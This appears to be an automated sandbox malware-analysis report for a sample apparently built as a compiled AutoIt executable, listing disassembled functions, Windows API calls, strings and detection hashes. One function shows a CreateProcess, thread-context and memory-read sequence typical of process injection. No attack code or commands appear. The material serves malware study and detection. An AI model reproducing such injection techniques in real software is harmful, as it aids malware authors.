                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                            • API String ID: 2861923089-1757145024
                                            • Opcode ID: e80d53b511181a821b7091187064f27e9daa1da14464875f8932160e786550f3
                                            • Instruction ID: 3cd38e579ebac8e49070ee57df3cad89243125e1f50bc7da9e354da0e4130a2a
                                            • Opcode Fuzzy Hash: e80d53b511181a821b7091187064f27e9daa1da14464875f8932160e786550f3
                                            • Instruction Fuzzy Hash: 89915C71A10219EFCF04EFA4D8919EDBBB5FF18314F14646AF815BB291EB30A945CB50
                                            Function 00E135B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E135A1,SwapMouseButtons,00000004,?), ref: 00E135D4
                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E135A1,SwapMouseButtons,00000004,?,?,?,?,00E12754), ref: 00E135F5
                                            • RegCloseKey.KERNELBASE(00000000,?,?,00E135A1,SwapMouseButtons,00000004,?,?,?,?,00E12754), ref: 00E13617
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: Control Panel\Mouse
                                            • API String ID: 3677997916-824357125
                                            • Opcode ID: c3b90da975ca0343859c78c3f072ec25aaf822fdeedc551bab2ec7f672134c92
                                            • Instruction ID: 5f39cf6ddb6dcb03a0f98959a8832c634147200073f6f31ca932256b1699b9d4
                                            • Opcode Fuzzy Hash: c3b90da975ca0343859c78c3f072ec25aaf822fdeedc551bab2ec7f672134c92
                                            • Instruction Fuzzy Hash: C6114871610208BFDB20CF65DC809EEB7BCEF44744F0054AAE805E7210D2719E949760
                                            Function 00D412A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00D41A5B
                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D41AF1
                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D41B13
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                            • String ID:
                                            • API String ID: 2438371351-0
                                            • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                            • Instruction ID: 3a8f3ffb69f6eeae9a17cea93f4b460429b0119433b846735d2f0ac4362bf336
                                            • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                            • Instruction Fuzzy Hash: 29620B74A14258DBEB24CFA4C851BDEB376EF58300F1091A9E10DEB390E7759E81CB69
                                            Function 00E797E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E15045: _fseek.LIBCMT ref: 00E1505D
                                              • Part of subcall function 00E799BE: _wcscmp.LIBCMT ref: 00E79AAE
                                              • Part of subcall function 00E799BE: _wcscmp.LIBCMT ref: 00E79AC1
                                            • _free.LIBCMT ref: 00E7992C
                                            • _free.LIBCMT ref: 00E79933
                                            • _free.LIBCMT ref: 00E7999E
                                              • Part of subcall function 00E32F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E39C64), ref: 00E32FA9
                                              • Part of subcall function 00E32F95: GetLastError.KERNEL32(00000000,?,00E39C64), ref: 00E32FBB
                                            • _free.LIBCMT ref: 00E799A6
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                            • String ID:
                                            • API String ID: 1552873950-0
                                            • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                            • Instruction ID: 8f46058b65454655cb150bf207f4ba99fd61ef740a654f8260448907620b65af
                                            • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                            • Instruction Fuzzy Hash: 70515FB1904618AFDF249F64CC45AAEBBB9EF88310F0054AEB249B7241DB315E80CF59
                                            Function 00E3493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                            • String ID:
                                            • API String ID: 2782032738-0
                                            • Opcode ID: 6b900c82ae833c016f0ad4fafe5841f230cacf6ecaddb2f96621bb99e00bcb06
                                            • Instruction ID: f252358f12469adb6b8ca58032f33ccae2360d123cc4bf8302be52952a2a18f5
                                            • Opcode Fuzzy Hash: 6b900c82ae833c016f0ad4fafe5841f230cacf6ecaddb2f96621bb99e00bcb06
                                            • Instruction Fuzzy Hash: 8E41C7B06007069BDB188EA9C888AAF7FA5EF84364F14A16DE855E76D0E771AD40CB44
                                            Function 00E14DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID: AU3!P/$EA06
                                            • API String ID: 4104443479-182974850
                                            • Opcode ID: e91a684d688d9192dc90cbe3e03041d8818a44fd5530fd35403bfb7bd2232e9a
                                            • Instruction ID: 72fa3667484323c2ebfc5fa6f0a0532211980a8be463d487938d443069e66a95
                                            • Opcode Fuzzy Hash: e91a684d688d9192dc90cbe3e03041d8818a44fd5530fd35403bfb7bd2232e9a
                                            • Instruction Fuzzy Hash: 66417DB2A041589BCF115B648851BFE7FE6AF45304F687065E842BF3C2C6219DC187A1
                                            Function 00E173E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E4EE62
                                            • GetOpenFileNameW.COMDLG32(?), ref: 00E4EEAC
                                              • Part of subcall function 00E148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E148A1,?,?,00E137C0,?), ref: 00E148CE
                                              • Part of subcall function 00E309D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E309F4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Name$Path$FileFullLongOpen_memset
                                            • String ID: X
                                            • API String ID: 3777226403-3081909835
                                            • Opcode ID: cefdd72620a6c243430671f3882cf1786fc3f118596bf1e308a3c51860085577
                                            • Instruction ID: 0789afc39ab1d2701a659dd0fa0eec33e2a8fe5ecfd9d4d9d69d830a56b3207d
                                            • Opcode Fuzzy Hash: cefdd72620a6c243430671f3882cf1786fc3f118596bf1e308a3c51860085577
                                            • Instruction Fuzzy Hash: C821C670A002989BCF11DF94D845BEE7BF8AF49714F00505AF408F7382DBB4598A8F91
                                            Function 00E7901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __fread_nolock_memmove
                                            • String ID: EA06
                                            • API String ID: 1988441806-3962188686
                                            • Opcode ID: d483d4cdf3cfc9f0d25f8d3ed2521e198da3c86de8ef57c8b38ac73060d4f2c8
                                            • Instruction ID: fb9fa26c453bc834794b0179cf2df59781b800092a70fe828cff7d865d7f3d7a
                                            • Opcode Fuzzy Hash: d483d4cdf3cfc9f0d25f8d3ed2521e198da3c86de8ef57c8b38ac73060d4f2c8
                                            • Instruction Fuzzy Hash: 7601F9728042586EDB28C6A8C81AFFEBBF89F01301F00419EF552E2181E5B5A604CB60
                                            Function 00E79B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00E79B82
                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E79B99
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Temp$FileNamePath
                                            • String ID: aut
                                            • API String ID: 3285503233-3010740371
                                            • Opcode ID: 6d2cadad0f54e05e0c601cc47b3c704e3abb636c79b1eeb3224ac7edc84d5998
                                            • Instruction ID: ca195edcbfa4a92bce6ea5f0909fb0a1746ac866b8e730bfe91fc6a330655a37
                                            • Opcode Fuzzy Hash: 6d2cadad0f54e05e0c601cc47b3c704e3abb636c79b1eeb3224ac7edc84d5998
                                            • Instruction Fuzzy Hash: D2D05E7954030DAFDB109B90DC0EF9A772CE704705F0042B2FE64E11A1EEB155998B95
                                            Function 00E8CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 027d01576b12c7e2023a8afe4a13a0e17be7a766763bedbcf552a78355c3374d
                                            • Instruction ID: fc22619f41531ed70ac216a366a5f92d655b2a3b8320e2c82f0d225b75fde4d9
                                            • Opcode Fuzzy Hash: 027d01576b12c7e2023a8afe4a13a0e17be7a766763bedbcf552a78355c3374d
                                            • Instruction Fuzzy Hash: 00F12A715083019FC714EF28C884A6ABBE5FF88314F14992EF899AB391D771E945CF82
                                            Function 00E143DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E14401
                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E144A6
                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E144C3
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: IconNotifyShell_$_memset
                                            • String ID:
                                            • API String ID: 1505330794-0
                                            • Opcode ID: 016f541235631aefe1e0b5d96cf5b0935058861786092a8c784548cdb6dda8f7
                                            • Instruction ID: 8664d76c02599636d9f60dc8fd88c1537148f397e78f950a90c9fa38d385dfdb
                                            • Opcode Fuzzy Hash: 016f541235631aefe1e0b5d96cf5b0935058861786092a8c784548cdb6dda8f7
                                            • Instruction Fuzzy Hash: 703180B05053018FD720DF65E8846DBBBE8FB48308F00092EF59AE3391D7756988CB92
                                            Function 00E3594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • __FF_MSGBANNER.LIBCMT ref: 00E35963
                                              • Part of subcall function 00E3A3AB: __NMSG_WRITE.LIBCMT ref: 00E3A3D2
                                              • Part of subcall function 00E3A3AB: __NMSG_WRITE.LIBCMT ref: 00E3A3DC
                                            • __NMSG_WRITE.LIBCMT ref: 00E3596A
                                              • Part of subcall function 00E3A408: GetModuleFileNameW.KERNEL32(00000000,00ED43BA,00000104,?,00000001,00000000), ref: 00E3A49A
                                              • Part of subcall function 00E3A408: ___crtMessageBoxW.LIBCMT ref: 00E3A548
                                              • Part of subcall function 00E332DF: ___crtCorExitProcess.LIBCMT ref: 00E332E5
                                              • Part of subcall function 00E332DF: ExitProcess.KERNEL32 ref: 00E332EE
                                              • Part of subcall function 00E38D68: __getptd_noexit.LIBCMT ref: 00E38D68
                                            • RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,?,?,?,00E31013,?), ref: 00E3598F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                            • String ID:
                                            • API String ID: 1372826849-0
                                            • Opcode ID: 171086253a638d71409c16a5cb5b9de630adfcf061c78fbfb6502166181263ea
                                            • Instruction ID: a8db6e9adeb4adabac66fa1b0682cc2622bacd28666924e171602d92a031ba07
                                            • Opcode Fuzzy Hash: 171086253a638d71409c16a5cb5b9de630adfcf061c78fbfb6502166181263ea
                                            • Instruction Fuzzy Hash: 1F01D232201B11EFE6112B35EC4AB6E7BD88FD2734F51202BF420BA2D1DA709D01C660
                                            Function 00E79B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E797D2,?,?,?,?,?,00000004), ref: 00E79B45
                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E797D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E79B5B
                                            • CloseHandle.KERNEL32(00000000,?,00E797D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E79B62
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleTime
                                            • String ID:
                                            • API String ID: 3397143404-0
                                            • Opcode ID: 62b4f77edbc81b529be546e77731ac27ce4d09b87699698932d9d820896f24c6
                                            • Instruction ID: 2cc0732084edb1adc4b60304304b39efd130f1cb8c427dc9e45b7ee91fcf5bdb
                                            • Opcode Fuzzy Hash: 62b4f77edbc81b529be546e77731ac27ce4d09b87699698932d9d820896f24c6
                                            • Instruction Fuzzy Hash: CAE08632181314FBD7211B66EC09FCE7B18EB05765F108222FB54B90E187B1251597DC
                                            Function 00E78F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                            Download Yara Rule
                                            APIs
                                            • _free.LIBCMT ref: 00E78FA5
                                              • Part of subcall function 00E32F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E39C64), ref: 00E32FA9
                                              • Part of subcall function 00E32F95: GetLastError.KERNEL32(00000000,?,00E39C64), ref: 00E32FBB
                                            • _free.LIBCMT ref: 00E78FB6
                                            • _free.LIBCMT ref: 00E78FC8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                            • Instruction ID: d7a470d9e7b4ed1328735d498c41ac620e228bb5c9ebaf2e8a6b909a0ee84a92
                                            • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                            • Instruction Fuzzy Hash: 92E012B17097054ACA28A578AE48AA35BEF5F48364B18281DF54DFB142DE24E841C124
                                            Function 00E1AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CALL
                                            • API String ID: 0-4196123274
                                            • Opcode ID: 5411f49255bc4172859bf510737d0dc968bfe10606e3ce256217a2297cfd30d9
                                            • Instruction ID: c4225fcd6cb8d6d387d2b843e944696e8c93fe85b47947dda92a2f52b4551e50
                                            • Opcode Fuzzy Hash: 5411f49255bc4172859bf510737d0dc968bfe10606e3ce256217a2297cfd30d9
                                            • Instruction Fuzzy Hash: 3C223B70609241DFC724DF14C494BAABBE1FF45304F19996DE89AAB262D731EC85CB82
                                            Function 00E1492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                            Download Yara Rule
                                            APIs
                                            • IsThemeActive.UXTHEME ref: 00E14992
                                              • Part of subcall function 00E335AC: __lock.LIBCMT ref: 00E335B2
                                              • Part of subcall function 00E335AC: DecodePointer.KERNEL32(00000001,?,00E149A7,00E681BC), ref: 00E335BE
                                              • Part of subcall function 00E335AC: EncodePointer.KERNEL32(?,?,00E149A7,00E681BC), ref: 00E335C9
                                              • Part of subcall function 00E14A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E14A73
                                              • Part of subcall function 00E14A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E14A88
                                              • Part of subcall function 00E13B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E13B7A
                                              • Part of subcall function 00E13B4C: IsDebuggerPresent.KERNEL32 ref: 00E13B8C
                                              • Part of subcall function 00E13B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00ED62F8,00ED62E0,?,?), ref: 00E13BFD
                                              • Part of subcall function 00E13B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00E13C81
                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E149D2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                            • String ID:
                                            • API String ID: 1438897964-0
                                            • Opcode ID: 4eeb6598803d0499e3085eac8bbfaebf52ba4039684911d7c58abb384c0230f0
                                            • Instruction ID: 03ddd6e71933f31507341e19955e8ee7f47c1fae827a931afb0a506471fa6891
                                            • Opcode Fuzzy Hash: 4eeb6598803d0499e3085eac8bbfaebf52ba4039684911d7c58abb384c0230f0
                                            • Instruction Fuzzy Hash: 1F118C719193119FC700DF2AED0594ABFE8EF94710F00451FF095A72B2DB709588CB92
                                            Function 00E15DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00E15981,?,?,?,?), ref: 00E15E27
                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00E15981,?,?,?,?), ref: 00E4E19C
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
